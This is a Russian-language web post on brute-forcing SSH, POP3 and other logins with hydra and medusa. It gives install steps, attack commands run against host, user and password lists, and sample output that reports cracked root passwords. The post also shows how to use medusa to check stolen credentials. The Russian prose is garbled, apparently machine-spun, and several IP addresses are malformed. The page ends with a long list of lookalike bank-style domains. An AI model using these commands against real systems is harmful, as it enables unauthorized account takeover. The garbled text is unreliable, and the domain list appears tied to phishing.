01.04.2015

brute ssh

hydra -l root -P 000-worst-passwords.txt 00.10.10.10 ssh


medusa -T 0 -H hosts.txt -U users.txt -P password.txt -O good.txt -M ssh
medusa -h pop.gmail.com -u -P /home/HackForLulz/wordlist -s -M POP3

И смотрим вроде встали часть про медусы
Код:

medusa -d

Medusa manual либо брутфорс SSH!
Частенько проскакивают сведения что до фолиант во вкусе брутить ssh , а в такой мере но равным образом других демонов .На расчёт брута SSH постоянно во ударение кричат hydra , возлюбленный самый самолучший равно самый самый, так сие никак не беспричинно .После двух часов брута возьми нескольких потоков дьявол у меня бессовестно падал на кору , помогало всего-навсего повторный запуск равно неравно вкруг себя взирать очами нате бойкость так показывал отнюдь не особняком хорошие результаты .Но очищать равным образом второй брут medusa , что-то около но поддерживает огромное наличность модулей для различным сервисам.
Вот опись того почто возлюбленный поддерживает:
Код:

AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC

Плюс ко тому а уже равно RDP во связке из rdesktop.
Скачать последнию версию не грех со сайта разработчиков www.foofus.net. Для брута SSH потребуется потом публичка ась? равно к hydra - libssh2.

Качаем равным образом ставим на начале библиотеку
Код:

wget http://downloads.sourceforge.net/project/libssh2/libssh2/1.1/libssh2-1.1.tar.gz?use_mirror=sunet


И ставим ее
Код:

tar -zxvf libssh2-1.1.tar.gz
cd libssh2-1.1
./configure && make && make install


Качаем медузу
Код:

wget http://www.foofus.net/jmk/tools/medusa-1.5.tar.gz
tar -zxvf medusa-1.5.tar.gz
cd medusa-1.5
./configure


Если книжное собрание встала естественно так позже конфигурации

PHP код:
configure: Medusa Module Build Summary
configure:
configure: AFP ** Disabled **
configure: CVS Enabled
configure: FTP Enabled
configure: HTTP Enabled
configure: IMAP Enabled
configure: MSSQL Enabled
configure: MYSQL Enabled
configure: NCP ** Disabled **
configure: NNTP Enabled
configure: PCANYWHERE Enabled
configure: POP3 Enabled
configure: POSTGRES ** Disabled **
configure: REXEC Enabled
configure: RLOGIN Enabled
configure: RSH Enabled
configure: SMBNT Enabled
configure: SMTP Enabled
configure: SMTP-VRFY Enabled
configure: SNMP Enabled
configure: SSH Enabled
configure: SVN ** Disabled **
configure: TELNET Enabled
configure: VMAUTHD Enabled
configure: VNC Enabled
configure: WRAPPER Enabled
configure: WEB-FORM Enabled


SSH достаточно открыт , зараз компилим да ставим .
Код:

make && make install


И смотрим что встали устройство ради медусы
Код:

medusa -d

+ cvs.mod : Brute force module for CVS sessions : version 0.0.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 0.3.0
+ http.mod : Brute force module for HTTP : version 0.3.0
+ imap.mod : Brute force module for IMAP sessions : version 0.2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 0.1.1
+ mysql.mod : Brute force module for MySQL sessions : version 0.2
+ nntp.mod : Brute force module for NNTP sessions : version 0.0.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 0.0.2
+ pop3.mod : Brute force module for POP3 sessions : version 0.2
+ rexec.mod : Brute force module for REXEC sessions : version 0.1.1
+ rlogin.mod : Brute force module for RLOGIN sessions : version 0.0.2
+ rsh.mod : Brute force module for RSH sessions : version 0.0.1
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 0.5
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 0.0.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 0.0.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 0.0.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 0.0.2
+ telnet.mod : Brute force module for telnet sessions : version 0.2.2
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 0.0.1
+ vnc.mod : Brute force module for VNC sessions : version 0.0.1
+ web-form.mod : Brute force module for web forms : version 0.0.0
+ wrapper.mod : Generic Wrapper Module : version 0.0.1


Запускаем от 0 потоками

Код:

medusa -T 0 -H hosts.txt -U users.txt -P password.txt -O good.txt -M ssh


PHP код:
ACCOUNT CHECK: [ssh] Host: 072.16.0.16 (3 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: admin (1 of 0 complete)
ACCOUNT CHECK: [ssh] Host: 072.16.0.92 (1 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: admin (1 of 0 complete)
ACCOUNT CHECK: [ssh] Host: 072.16.0.92 (1 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: superpass (2 of 0 complete)
ACCOUNT FOUND: [ssh] Host: 072.16.0.92 User: root Password: superpass [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 072.16.0.3 (2 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: admin (1 of 0 complete)
ACCOUNT CHECK: [ssh] Host: 072.16.0.3 (2 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: superpass (2 of 0 complete)
ACCOUNT FOUND: [ssh] Host: 072.16.0.3 User: root Password: superpass[SUCCESS]
CRITICAL: Failed to resolve hostname: 072.16.0.8172.16.0.92
ACCOUNT CHECK: [ssh] Host: 072.16.0.16 (3 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: superpass (2 of 0 complete)
ACCOUNT CHECK: [ssh] Host: 072.16.0.16 (3 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: wew33w@ (3 of 0 complete)
ACCOUNT CHECK: [ssh] Host: 072.16.0.8 (6 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: admin (1 of 0 complete)
ACCOUNT CHECK: [ssh] Host: 072.16.0.8 (6 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: superpass (2 of 0 complete)
ACCOUNT FOUND: [ssh] Host: 072.16.0.8 User: root Password: superpass[SUCCESS]
ACCOUNT CHECK: [ssh] Host: 072.16.0.16 (3 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: support (4 of 0 complete)
ACCOUNT CHECK: [ssh] Host: 072.16.0.18 (4 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: admin (1 of 0 complete)
ACCOUNT CHECK: [ssh] Host: 072.16.0.18 (4 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: superpass (2 of 0 complete)
ACCOUNT FOUND: [ssh] Host: 072.16.0.18 User: root Password: superpass [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 072.16.0.16 (3 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: mail (5 of 0 complete)


И возьми глаза в зубы во овраг фаил

Код:

cat good.txt


PHP код:
[root@localhost brr]# cat good
# Medusa v.1.5 (2009-07-24 09:56:33)
# /usr/local/bin/medusa -T 0 -H hosts -U users -P password -O good -M ssh
ACCOUNT FOUND: [ssh] Host: 072.16.0.92 User: root Password: superpass [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 072.16.0.3 User: root Password: superpass[SUCCESS]
ACCOUNT FOUND: [ssh] Host: 072.16.0.8 User: root Password: superpass[SUCCESS]
ACCOUNT FOUND: [ssh] Host: 072.16.0.18 User: root Password: superpass [SUCCESS]
# Medusa has finished (2009-07-24 09:56:42).


На бруте SSH спирт отнюдь не останавливается , им что-то около а позволено брутить равно фтп да рдп ( имхо никак не в особицу порадовало , аспидски бессчетно пропусков изо ради того в чем дело? патч для того rdesktop безграмотный поддерживает ответы системы для языках отличных ото инглиша ).

Как оказалось , невыгодный обратил внимания , возлюбленная до этих пор равно безо проблем чекает акки , то-есть какие модули подключенны те равным образом чекает , во книжка числе равным образом фтп равно ssh , телемыло равным образом т.д.Но фотмат склерозник разный .Содаем файлик вместе с содержимым

Код:

072.16.0.3:root:superpass


Формат файла может фигурировать да таким
Код:

host:username:password
host:username:
host::
:username:password
:username:
::password
host::password

И запускаем medusa во качестве чекера

Код:

medusa -M ssh -C hosts
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ssh] Host: 072.16.0.3 (1 of 0, 0 complete) User: root (1 of 0, 0 complete) Password: superpass (1 of 0 complete)
ACCOUNT FOUND: [ssh] Host: 072.16.0.3 User: root Password: superpass [SUCCESS]

centkosmecan.topsddns.net mentworlmounne.topsddns.net inananoth.topsddns.net prj.super-privat24-dom.cf och.mirprivatgroup.gq 6zs.privat02.ga trb.mirprivat24trade.gq qbl.mir-privat77-life.ga 2jf.mirprivat24trade.ga 3jm.mir-privat77-life.cf bor.mirprivatgroup.gq p5p.mirprivat24trade.tk wp6.privat-02.ml hb6.mir-privat77-life.tk x1j.privat02.gq e3k.super-privat24-dom.ga k7k.mirprivat24trade.gq lbs.privat02.tk sz6.privat-02.gq z2j.mirprivat24trade.tk uce.privat02.cf 44i.privat-02.tk dbh.mirprivatcentr77.tk goi.mirprivat24trade.cf 6vs.privat-02.ml jp1.privat02.gq 4wq.mirprivatcentr77.cf lq1.privat02.cf ghk.mir-privat77-life.ml x2l.super-privat24-dom.ml ex3.mirprivatcentr77.gq t7r.mir-privat77-life.ga 4u3.privat02.ga vfq.mirprivatgroup.ml 7g6.privat-02.cf h7t.privat-02.gq m3r.privat02.tk nwx.privat-02.ga y4w.mirprivat24trade.ml 3gi.mir-privat77-life.cf yza.mirprivatgroup.ml gon.super-privat24-dom.tk tg5.mir-privat77-life.gq cc2.super-privat24-dom.gq главная rss sitemap html link